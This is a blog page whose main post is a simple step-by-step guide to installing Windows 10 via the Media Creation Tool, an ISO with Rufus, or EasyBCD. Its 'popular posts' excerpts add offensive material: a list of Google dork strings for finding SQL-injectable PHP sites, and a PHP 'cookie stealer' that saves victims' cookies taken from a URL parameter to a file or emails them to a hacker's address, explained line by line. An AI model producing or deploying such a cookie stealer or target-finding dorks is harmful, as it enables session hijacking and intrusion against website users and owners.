Skip to main content

Step By Step Guide to Install Windows 10

There are multiple ways to install Windows 10. we are going to discuss some of them here.


1. Using Media Creation Tool

Download the tool from here. It will automatically check your system configuration and start downloading the windows 10 from Microsoft server. This tool is an easy to upgrade medium if you are on any previous version of windows. The only drawback of this is you cannot use this tool if your Computer is offline. you can also use this tool to create a installation media to install windows on other computer.

2. Using a Disc Image (ISO File)

If you already have a iso file windows to downloaded with you. you can use that to use that to create a window installation media. If not you can download that from here. once downloaded you can use any bootable media creating tool like Rufus. Once downloaded you can select your iso file and removable disk from which you want to install windows.

3. Without Using a Removable disk 

If you don't have any flash drive or CD to create a installation media. you can use Media Creation Tool to install windows but if you are offline you can use to EasyBCD to boot from directly from your hard disk. But using this tool a tricky if you don't know how to operate it or if you dont understand the basic terms. please don't use it.

Installation Steps

The very step in installing any OS is boot device selection. In the world of technology there are multiple brands and all have their different ways to change the boot device. But the common one is to navigate to BIOS and change it from there. Once done with selecting the boot device you'll have to follow the below mentioned steps:




Select the desired Language, Time and currency format and the keyboard layout. then click on NEXT




If you have the Activation Key you can insert it or skip it.




Select your installation type, whether you want to do a upgrade or a clean installation


Select the drive on which you want to install the windows








Select your setting type if you want to customize some settings you can do it here.




Select the owner of the system.


Create or login with your microsoft account. If you do not wish to do it you can skip it to create a local account.


Select username and password.



Voila !! the installation is completed . you can now proceed with installing all the other applications.

Comments

Popular posts from this blog

Php And Google Dorks 2017

A Dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Here is a list of dorks to find SQL injectable websites. Google Dorks trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id=...

Create cookie stealer in PHP? get via email

<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()   ...

Run python commands from a bash shell

In this post I am going to show you how you can run python commands from inside a shell. There are already a few ways of doing so Write your python code in a .py file and run "python yourfile.py" Open up IDLE shell by just typing "python" and writing your command in that shell. There is also another option of python command - $ python -c 'your_command_here'  which will run the python command you specify in quotes. However, the problem with above mentioned methods is, they are time consuming. If you want to quickly perform a list comprehension or anything equivalent in python, you have to either write a script or manually open a python interactive terminal and write your command there. I am going to show you a little tweak you can do in your shell to execute python code (or parts of it) directly from command line. It works as below - $ p '<your_python_code_here>' You type "p" followed by the python statement yo...